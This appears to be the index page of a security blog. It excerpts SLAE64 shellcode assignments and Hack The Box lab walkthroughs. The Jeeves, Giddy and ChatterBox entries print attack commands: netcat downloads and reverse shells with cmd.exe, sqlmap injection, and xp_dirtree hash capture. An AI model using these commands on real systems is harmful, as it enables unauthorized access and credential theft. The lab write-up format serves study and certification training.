This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847. The Objectives for the Assignment: create a custom encoding scheme like the Insertion Encoder; PoC with execve-stack as the shellcode to encode with your scheme and execute. So we used the following python… Continue reading SLAE64: Assignment 4 – Custom Encoder
Author: admin
SLAE64: Assignment 3 – Egghunters
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847. The Objectives for the Assignment: study about egg hunter shellcode; create a working demo of the egghunter; should be configurable for different payloads. An Egg Hunter is the first stage of a multistage payload. It consists of… Continue reading SLAE64: Assignment 3 – Egghunters
SLAE64: Assignment 2 – Reverse Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847. The Objectives for the Assignment: create a shell_reverse_tcp shellcode: reverse connects to configured IP and port; needs a passcode; if passcode is correct, then execs shell; remove 0x00 from bind tcp shellcode. So I took… Continue reading SLAE64: Assignment 2 – Reverse Shell
SLAE64: Assignment 1 – Bind Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847. The Objectives for the Assignment: create a shell_bind_tcp shellcode: binds to a port; needs a passcode; if passcode is correct, then execs shell; remove 0x00 from bind tcp shellcode. So I took the code… Continue reading SLAE64: Assignment 1 – Bind Shell
HTB – Arctic Walkthrough
nmap. Port 8500 – ColdFusion. ColdFusion File Inclusion. Hash Crack. JSP Shell Creation & File Upload & Shell: run the task and open the file in the following directory: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp. Privilege escalation: Python exploit suggester; upload ms10-059.exe (Chimchurri) via Powershell; get an admin shell with the exe file.
HTB – NetMon Walkthrough
nmap. Anonymous FTP. PRTG files are under C:\ProgramData\Paessler\PRTG Network Manager. Looking for password. The version of PRTG is vulnerable; use the following exploit: I got NT Authority\System
HTB – Tenten Walkthrough
nmap. WPScan – enumerate users. WPScan – Plugin Vulnerability (IDOR) found. As the PoC explained in the above URL, I tried to upload CV files first. Since wp saves the uploaded files as /wp-content/uploads/{year}/{month}/{file name}, I checked if the file I uploaded exists, and yes, it's uploaded. Also in the HTML code of the application page, I… Continue reading HTB – Tenten Walkthrough
HTB – Jeeves Walkthrough
nmap; gobuster. Jenkins Code Execution: create a project on Jenkins. Low Privileged Shell: enter commands under Build Section:
powershell wget "" -outfile "nc.exe"
nc.exe 7777 -e cmd.exe
And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell. Meterpreter Shell: create a… Continue reading HTB – Jeeves Walkthrough
HTB – Giddy Walkthrough
nmap; gobuster. Search field – SQL error. SQL Injection: you can use the cheatsheet of PentestMonkey, or you can use sqlmap:
sqlmap --url --dbms=mssql --dbs (databases)
sqlmap --url --dbms=mssql --current-user (current user)
Capture MSSQL credentials with xp_dirtree and smbserver.py. The following blog post explains the process very well:
EXEC MASTER.sys.xp_dirtree '\\yourIP\something'
Listen with responder to steal the user hash: responder -I tun0… Continue reading HTB – Giddy Walkthrough
HTB – ChatterBox Walkthrough
nmap. Exploit: create a shell with msfvenom as described in the exploit; get the exploit from searchsploit or exploitdb. Shell. Privilege Escalation:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
(New-Object System.Net.WebClient).DownloadFile('', 'C:\Users\Alfred\Desktop\nc.exe')
$username = 'administrator'
$password = 'Welcome1!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList '-e cmd.exe 1234' -Credential $credential
And we get an admin… Continue reading HTB – ChatterBox Walkthrough